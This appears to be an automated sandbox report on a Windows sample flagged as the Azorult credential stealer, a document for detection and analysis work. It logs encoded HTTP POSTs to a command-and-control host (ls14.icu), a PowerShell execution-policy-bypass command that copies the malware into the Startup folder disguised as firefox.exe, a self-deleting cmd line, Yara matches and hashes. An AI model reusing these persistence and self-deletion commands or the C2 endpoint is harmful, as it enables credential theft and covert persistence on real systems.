50 00 e8 49 05 fc 68 39 e3 51 06 f8 60 07 e9 55 2f cf 30 07 d8 60 13 d9 49 1e c7 36 65 cb 4b 04 dd 48 3c 9b 68 37 9c 4e 24 e2 40 3a db 66 12 d6 79 1e c9 68 2f e3 42 3e dc 40 06 9e 49 11 ff 73 12 ed 57 1c e4 49 03 f8 57 07 f8 49 04 fb 68 6c e9 50 00 d6 45 1f f8 7b 10 cc 31 1b 9f 61 02 f8 76 31 e6 4d 36 ed 50 3a db 67 1d c6 33 19 ed 6c 20 f4 44 6c c4 48 3c d9 72 19 c0 6b 26 cd 7a 3a e4 4e 2f ef 49 1e d9 68 21 ed 52 65 e5 50 04 c5 37 19 c4 52 67 e2 69 10 d7 4e 2c 9a 7b 1a ea 68 63 f8 55 18 e0 40 32 93 3e 69 81 60 6b 92 6d 6b 07 16 0c 82 a6 43 b3 75 f4 a5 1e 37 09 14 00 82 a8 5f f0 71 f2 a7 56 79 0a 57 48 9e e6 00 b0 66 f1 a7 09 19 3c f6 65 ac cb 30 9e 06 9d cb 33 ab 99 66 65 17 cb 30 9e 02 9d cb 33 14 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 ec 66 66 65 a1 d4 8a 90 02 29 c2 fe 75 de 67 29 62 ea 64 f6 6b ee eb 43 26 09 01 17 ce a6 10 [TRUNCATED] Data Ascii: 445e?6Ow3!PeOHh-PVePIh9Q`U/0`I6eKH<h7N$@:fyh/B>@IsWIWIhlPE{1av1M6P:g3l DlH<rk&z:N/Ih!ReP7RgiN,{hcU@2>i`kmkCu7_qVyWHf<e03fe03ffe03Tffe03Tffe03ffe)ug)bdkC&c\ FE")5ET,9pffe0j0U1U
Jan 10, 2025 19:12:27.962030888 CET	1236	IN	Data Raw: aa a0 c9 6a 03 f7 43 a5 aa 0c 9c 91 ae a1 b8 08 01 f6 31 c7 55 0c 50 f4 a8 5b cb 6a 03 f7 ff 8e 30 9e 4e 9c c9 33 d5 dc 44 c9 af cb 30 9e 02 9d cb 33 b4 66 64 44 a4 ca 3e 94 02 9b cb 33 54 62 66 65 af cb 30 9e 02 9d cb 33 54 76 66 65 af eb 30 9e Data Ascii: jC1UP[j0N3D03fdD>3Tbfe03Tvfe0#Tvfe03^ffe03TVfe03Wf&`43Tfve03Dffe0)3Tffe03efe03Tjfe03Tffe0V3Tffe03Tffe03Tffe03T
Jan 10, 2025 19:12:27.962044954 CET	1236	IN	Data Raw: cb 58 31 14 08 00 c3 f8 02 b0 50 f8 aa 57 17 09 08 16 c0 a7 55 c9 02 ce ae 47 17 09 08 16 c0 a7 55 dd 76 ef a7 7b 35 08 02 09 ca b9 30 f5 67 ef a5 56 38 55 54 4b fc ae 44 dd 6d f3 b8 5c 38 03 25 11 dd a7 78 ff 6c f9 a7 56 26 66 35 00 db 88 5f f0 Data Ascii: X1PWUGUv{50gV8UTKDm\8%xlV&f5_qVUlfH5_qVBv\:0gV8UTKYg]'gkp;gi]1UWBv\:03Tffe03Tffe03Tffe03Tffe03T
Jan 10, 2025 19:12:27.962080002 CET	1236	IN	Data Raw: a4 33 24 66 1f 65 dd cb 59 9e 65 9d a3 33 20 66 66 65 06 cb 10 9e 4f 9d a2 33 37 66 14 65 c0 cb 43 9e 6d 9d ad 33 20 66 46 65 ec cb 5f 9e 70 9d bb 33 3b 66 14 65 ce cb 44 9e 6b 9d a4 33 3a 66 48 65 8f cb 71 9e 6e 9d a7 33 74 66 14 65 c6 cb 57 9e Data Ascii: 3$feYe3 ffeO37feCm3 fFe_p3;feDk3:fHeqn3tfeWj3'fFeUq3&feT,3jfmep33feQn3=fe^c31ffe@k31feDw3Tffe3&feEa3feU3feBm3;fe"3=fe_u3
Jan 10, 2025 19:12:27.962091923 CET	1236	IN	Data Raw: b1 e2 55 8e ba 7a 20 00 2b 8f 9d 9f c8 32 54 67 c5 e7 ae c2 00 1c 03 98 fb 2e 52 65 33 78 a1 cf 26 9a 16 78 ac 05 01 39 d6 9c fd 0e 9c d5 d4 f3 fe 8c dc 5c cb 20 00 fb 2f 98 01 c8 d6 10 50 7e 56 73 2f df 13 aa fa 44 99 75 24 6c 8b 25 54 bd cb 2d Data Ascii: Uz +2Tg.Re3x&x9\ /P~Vs/Du$l%T-)-iV1eV/kuAG$\IJ\oA;SoX=I@mP I(BqGQrrz6)6Qagd2;`g`G \JG,P&mC?ID-P&
Jan 10, 2025 19:12:27.962105036 CET	1236	IN	Data Raw: ba 70 ba bf 59 21 06 a3 14 cb f6 78 01 53 7a 51 56 34 a9 c8 65 83 13 99 81 03 1c c2 20 55 eb fa 3c ae 08 9b c8 66 50 6d 75 66 ee 84 73 af 36 ad f9 35 57 33 62 60 bc e0 02 ac 3b a5 fb 00 7f 57 07 07 c9 f2 55 ab 64 b0 a8 56 30 56 4b 51 9d ae 06 b3 Data Ascii: pY!xSzQV4e U<fPmufs65W3b`;WUdV0VKQcWy_V;1Vyc-%rtG*cHUsr\|eRe3xO!Dr7KSmU H@kA8IEv~=%YRld^KV3P&V?4Ugb+5U
Jan 10, 2025 19:12:27.962117910 CET	1236	IN	Data Raw: c4 37 50 65 64 64 29 fb 22 98 0b b6 cd 32 50 67 e4 52 ba ca 34 9b 00 9e ca 33 55 56 45 63 a6 e0 36 9f 06 9c 49 04 41 64 62 73 ab df cd 4f 33 d3 18 15 de f3 87 fd cf f0 98 af 6d 3b f7 8f 8c 4b 56 7c a9 c2 1b 98 03 99 ca b1 63 72 64 61 a3 d5 3a 9e Data Ascii: 7Pedd)"2PgR43UVEc6IAdbsO3m;KV\|crda:Q36f%e/P~Vs/>2es@7^jV5eV#kq=G$\IJ\oA;SoX=I@mP IBqG&B,_d2`m12P.V#6)6QaVg)Xv{
Jan 10, 2025 19:12:27.962157965 CET	1000	IN	Data Raw: 2c 7d f7 c7 a7 46 fc 01 bd 64 47 52 c2 e3 0a c9 b6 d5 ed cf 92 67 a4 f1 58 54 83 4e ba 23 fc 7b b6 4e e7 b5 8d 1d 73 ca e0 2a fa 99 3c 7a 01 b1 30 59 c4 f6 56 0b 28 38 69 ae 9f 67 b5 e5 c3 d5 8e 44 38 b5 c8 4c 11 6e c3 84 07 0b 34 d1 ea 5b af d6 Data Ascii: ,}FdGRgXTN#{Ns*<z0YV(8igD8Ln4[UEAO\Mt9&f,g8uFpVd-,'WcPjRV{h722Tg`:<Re3x1a0UgU3%PrEQWbr&s{8Re3x4MD
Jan 10, 2025 19:12:27.962189913 CET	1236	IN	Data Raw: 10 04 1b a5 91 8d a4 22 61 74 a4 74 09 98 25 f9 5c 2c fc 42 9a fb d8 45 af 03 12 56 2d 19 10 f9 c9 0e 79 c9 3f ea 17 2f 11 7b b7 2d 01 50 e0 1e 32 60 7b 8a 1e ce ae 09 7b 96 2c cd d5 c5 39 be 2a 47 90 1a d8 46 76 49 54 cd a7 a5 90 c5 8e b8 74 93 Data Ascii: "att%\,BEV-y?/{-P2`{{,9*GFvITtDy .%zgB;:aaXo+}w1=%?uR.I\|dgdJ{]`e0#W dw`f8@<^5W3bbbf]0WxU3&_v\&Ylu`e0
Jan 10, 2025 19:12:27.962202072 CET	1236	IN	Data Raw: 80 86 ac 0b 19 ea 02 3f 16 ce de 62 52 55 f7 a6 36 a2 87 67 1c 62 e7 2d bf f9 85 35 f1 7d a5 b3 a5 fe 23 3f b7 f0 25 48 d5 eb 41 b8 bd 51 ad c7 d9 f8 81 84 df 57 08 b9 68 4c 6b a3 e9 4b 65 2e d0 ba 64 e6 64 12 e6 75 39 a1 12 2d b0 74 b6 d2 45 8a Data Ascii: ?bRU6gb-5}#?%HAQWhLkKe.ddu9-tEA=c?Uakio~QKGUpC4leIUw},2zRlMc152eD\Ih2>DDg2:4.d4`lN42P(U'2PgR
Jan 10, 2025 19:12:27.966923952 CET	1236	IN	Data Raw: 28 55 e3 fb 7a 98 0a b6 cd 32 51 63 61 55 ad 4d 0e f6 76 e9 bb 09 7b 49 11 12 d8 e5 5d f7 61 ef a4 40 3b 00 12 4b cc a4 5d b1 72 f6 a2 1c 37 03 14 11 dc e4 7d f7 61 de a4 57 07 0f 01 35 ec 8a 6f ac 32 ac fb 1e 64 51 4b 55 99 e5 53 ec 76 ad c7 35 Data Ascii: (Uz2QcaUMv{I]a@;K]r7}aW5o2dQKUSv5W3{vY`oO)i8Qfe0#L)(gcvj,NHf=s3rO=3c<h7& >MWa'+s)2/pjZc644.6p?f)@<*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49767	104.21.75.48	80	7816	C:\Users\user\Desktop\jd4t3R7hOq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:12:32.319608927 CET	163	OUT	POST /HK341/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: ls14.icu Content-Length: 42610 Cache-Control: no-cache
Jan 10, 2025 19:12:32.319633961 CET	11124	OUT	Data Raw: 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 ec 26 66 96 26 66 9f 42 70 9d 37 70 9d 37 70 9d 3b 14 8b 31 11 ef 26 66 9e 26 66 99 26 66 97 40 70 9d 36 11 8b 30 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p41&f&fBp7p7p;1&f&f&f@p60f1Gp7p4p4p1p2p3pFp3)j;l"&g&f&f&gF;f'q<f)&f&fp2p4p:p5p3p6)l!j)0e&fp3)0f0gF)1Bm@4`@x1l.aA7b@cGc:;a6x
Jan 10, 2025 19:12:32.324536085 CET	3708	OUT	Data Raw: 4c 0f e4 56 16 e2 57 17 e5 48 0f e5 51 1e e1 52 14 f4 54 0d e6 48 14 e6 55 1e ea 4c 13 e9 48 01 e7 52 1d eb 44 16 e3 53 0c e6 48 19 e9 4a 11 eb 50 02 e0 42 03 ef 50 13 fb 40 1a e9 40 0c ff 52 07 e2 54 04 e7 54 11 e8 45 16 ff 5a 1d f7 4b 1e e5 53 Data Ascii: LVWHQRTHULHRDSHJPBP@@RTTEZKSLHL@HW[ZYYN@[OKWJQNKUTLGHBFMPVHOTTWEW[AIDOYZVDOUWUHNP
Jan 10, 2025 19:12:32.324584007 CET	7416	OUT	Data Raw: 07 41 ae 03 55 ae 03 55 ae 03 55 d8 4a c0 54 01 51 ae 03 57 aa 03 55 8c 03 55 ae 45 3c c2 66 26 f2 32 09 e3 52 14 f9 5b 00 f7 42 1c e5 5f 04 f8 57 03 e0 4a 17 e5 50 11 80 7b 39 dd 7b 04 f8 57 03 e0 4a 17 e5 50 11 ed 57 14 ff 41 12 ef 4c 0d ed 47 Data Ascii: AUUUJTQWUUE<f&2R[B_WJP{9{WJPWALGIZIOYJSATHKFYRJRUKNHDN@AFTLQWAUGO@FDJGDTBEORGAI[FDYJE
Jan 10, 2025 19:12:32.324696064 CET	4944	OUT	Data Raw: 53 10 e8 47 0c eb 4c 1b e2 48 05 eb 4e 11 fb 48 16 fc 4a 1b f4 4a 07 fb 50 1e ea 47 1b f7 41 1b ec 5a 1c e7 46 13 f7 42 0d e0 45 03 e8 44 1d eb 49 01 e6 45 01 fb 53 1c ed 42 02 ec 46 01 e7 4a 14 e0 5a 07 e1 4d 13 fd 52 13 ec 4b 10 e9 49 1c fd 46 Data Ascii: SGLHNHJJPGAZFBEDIESBFJZMRKIFSSFW[VFIZV[QFUQAEEIOUABOOTB_HVUUU#UQBUj9p_WJPg:{WJPWALG
Jan 10, 2025 19:12:32.324790955 CET	6180	OUT	Data Raw: 50 1e e3 4c 18 ea 4e 18 ff 59 1f e4 42 1a e8 4d 1d e8 42 18 e7 41 16 e2 40 19 f4 4b 04 ed 4a 1e e2 4c 17 f4 4f 1b fd 55 17 f8 40 1d ea 4c 0c e7 4b 18 ef 54 02 e4 4d 04 e6 59 11 e9 48 03 ed 4c 16 e7 51 04 e1 5a 01 fb 45 10 f9 42 12 f4 54 17 fe 4d Data Ascii: PLNYBMBA@KJLOU@LKTMYHLQZEBTMEHWPORBPMYPEFUNBGOIV[STUSLD[LNPOGJZVLNVZNGDAGLTI[GUHM
Jan 10, 2025 19:12:32.329509020 CET	2472	OUT	Data Raw: 44 02 e4 46 1b f6 4c 0f f9 4c 02 ed 40 0d eb 50 0c e3 53 1c e4 57 12 ff 5b 05 fc 4c 1f e3 55 04 fe 50 0d e9 4b 06 f7 4e 1a e0 46 01 e6 56 13 f4 59 0f f9 5a 17 e0 4d 02 ea 42 1b fc 4b 1b e8 44 1b e3 42 05 f6 40 13 e8 52 04 ea 57 16 e7 4e 07 ed 4c Data Ascii: DFLL@PSW[LUPKNFVYZMBKDB@RWNLENA[EKWWWVZYHHYRNZ[URJIWT@TFSBGWUNFLBWSYA@BSIGGGVNOIA
Jan 10, 2025 19:12:32.329703093 CET	3708	OUT	Data Raw: 66 39 86 51 7c 8e 40 3a dc 66 7d fa 4e 7c 9c 23 16 fe 56 75 98 35 65 9e 23 15 8e 31 7b 9a 33 75 e9 4b 2f a3 09 16 fe 56 75 ed 6c 20 c0 77 6f 8e 37 58 a4 44 30 da 51 14 e3 39 75 96 32 6c 9f 0e 5f f8 6a 31 cb 6c 75 e7 6d 33 c1 0e 5f e3 6a 36 dc 6c Data Ascii: f9Q\|@:f}N\|#Vu5e#1{3uK/Vul wo7XD0Q9u2l_j1lum3_j6l&e!A4j6G<s9zug4w0_X_P,w0#l6p&_P,w0_d<w'_&p&f-_n:zul8q0p<mX`&p&f-_j;m<-0fX&q#`0-0fX\u6l&-0fX
Jan 10, 2025 19:12:32.329737902 CET	3058	OUT	Data Raw: 65 21 f3 0e 5f a3 09 12 c1 6c 32 c2 66 75 ed 6b 27 c1 6e 30 86 32 64 99 2d 65 80 36 6c 9d 3b 7b 9f 37 6c 87 0e 5f e3 6a 36 dc 6c 26 c1 65 21 8e 46 31 c9 66 7d 9f 32 62 80 33 7b 9c 33 61 9b 2d 61 99 2a 58 a4 4e 3c cd 71 3a dd 6c 33 da 23 10 ca 64 Data Ascii: e!_l2fuk'n02d-e6l;{7l_j6l&e!F1f}2b3{3a-aXN<q:l3#d0V%b!+d0{4b2d_j6l&e!F1fuf7j01uv;j8+d4{-g7`7b_b##w:V%b!q}-m0m-l_b##mV%b!#f2}-e0m3{XN<q:l3#p ou(~1e6x3g
Jan 10, 2025 19:12:36.051358938 CET	839	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 18:12:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.37 Vary: User-Agent cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O%2FxoxPGZ1CkvCHzg5%2FSY49jmc%2BfzHoe61uXcSWMlJlB2vE5pFbNCdxPql3u0QpYy1OiGZE0hh8cZDROXfdV%2BiX381SHLmgPm69WWdXSwAM8uDITyS%2FbYahRzsQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffea2c8988d7cac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1750&rtt_var=875&sent=20&recv=44&lost=0&retrans=0&sent_bytes=0&recv_bytes=42773&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 66 61 6c 73 65 4f 4b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7falseOK0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49807	104.21.75.48	80	4900	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:12:39.944972992 CET	266	OUT	POST /HK341/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: ls14.icu Content-Length: 105 Cache-Control: no-cache Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 ec 26 66 96 26 66 9f 42 70 9d 37 70 9d 37 70 9d 3b 14 8b 31 11 ef 26 66 9e 26 66 99 26 66 97 40 70 9d 36 11 8b 30 66 8b 31 11 ea 47 70 9d 37 70 9d 34 70 9d 34 70 9d 31 10 ea Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p41&f&fBp7p7p;1&f&f&f@p60f1Gp7p4p4p1
Jan 10, 2025 19:12:41.007443905 CET	827	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 18:12:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.37 Vary: User-Agent cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AV5wlcR2FnYtJmFlalaE%2BkxUvZMwcuyFqaIai53S2RQjFgGsmt4vzyJz0K2iLBJmDKD6%2B7c%2BDddCK5QqDFxJcPuyf5OiD9CmF6qGzGfkGEW%2F4JrCRNTq9a%2Bg0g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffea2f84c6c8ccc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1923&min_rtt=1923&rtt_var=961&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=266&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 66 2d c7 77 0d 0a Data Ascii: 4f-w
Jan 10, 2025 19:12:41.008208036 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	3
Start time:	13:12:21
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\jd4t3R7hOq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\jd4t3R7hOq.exe"
Imagebase:	0xfc0000
File size:	326'144 bytes
MD5 hash:	74039AD774774D76DBA815FF486BBD03
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Azorult, Description: detect Azorult in memory, Source: 00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	13:12:22
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe'
Imagebase:	0x6f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:12:22
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:12:24
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\jd4t3R7hOq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\jd4t3R7hOq.exe"
Imagebase:	0xf50000
File size:	326'144 bytes
MD5 hash:	74039AD774774D76DBA815FF486BBD03
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Azorult_1, Description: Azorult Payload, Source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Azorult, Description: detect Azorult in memory, Source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000007.00000002.1424878829.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000007.00000002.1429821413.0000000004210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:12:24
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	13:12:35
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "jd4t3R7hOq.exe"
Imagebase:	0xc30000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:12:35
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe"
Imagebase:	0x140000
File size:	326'144 bytes
MD5 hash:	74039AD774774D76DBA815FF486BBD03
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 0000000B.00000002.2552789436.0000000004CD0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	13:12:35
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:12:35
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\timeout.exe 3
Imagebase:	0x70000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:12:36
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe'
Imagebase:	0x6f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:12:36
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:12:38
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe"
Imagebase:	0xad0000
File size:	326'144 bytes
MD5 hash:	74039AD774774D76DBA815FF486BBD03
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.5%
Total number of Nodes:	161
Total number of Limit Nodes:	17

Executed Functions

Function 06682100 Relevance: 6.9, Strings: 5, Instructions: 608
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hcq, xrefs: 066836F3
Hcq, xrefs: 0668366C
Hcq, xrefs: 0668377D
Hcq, xrefs: 0668383B
Hcq, xrefs: 066835D9

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID:
String ID: Hcq$Hcq$Hcq$Hcq$Hcq
API String ID: 0-1692708840
Opcode ID: b4e25d59955af9d6310642842f1734524f8ec45b378feb51aee7ab14c18f8d3b
Instruction ID: f4eb2a0873f1f60818c8a8103898f532ca051de347ed0368925bbab444047dbe
Opcode Fuzzy Hash: b4e25d59955af9d6310642842f1734524f8ec45b378feb51aee7ab14c18f8d3b
Instruction Fuzzy Hash: BF324F70E002598FDB94EFB9C8907AEBBB2BF88700F148569D409AB395DF349D45CB91

Function 0668E820 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 7a4830a6c7a8a673e913a879dbf026b0968cefacb318c27475a1ac4acd8e5d5d
Instruction ID: 1432fb3c5f6fc3eee6a91a83633612f275c81c3132929b58e82ebc58f1f923b2
Opcode Fuzzy Hash: 7a4830a6c7a8a673e913a879dbf026b0968cefacb318c27475a1ac4acd8e5d5d
Instruction Fuzzy Hash: 7AF14D30E00209CFDB54EFA9C944B9DBBF1BF88314F158669E419AF365DB71A949CB80

Function 06683008 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557473705.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6680000_jd4t3R7hOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce5f2682b8994f90296acdb022aa8dd68e1df7608f6a6bc955d249d7a306376
Instruction ID: ef2a77a17d105b3dfd2abfd5eb69a37ae48a0e3b371a45d15bed273440ee6498
Opcode Fuzzy Hash: 5ce5f2682b8994f90296acdb022aa8dd68e1df7608f6a6bc955d249d7a306376
Instruction Fuzzy Hash: CBD16B70E002588FCB55DFB8C89079DBBB2AF89700F14C6AAD449AB355DB359985CF90

Function 01A8AD48 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01A8AF9E

Memory Dump Source

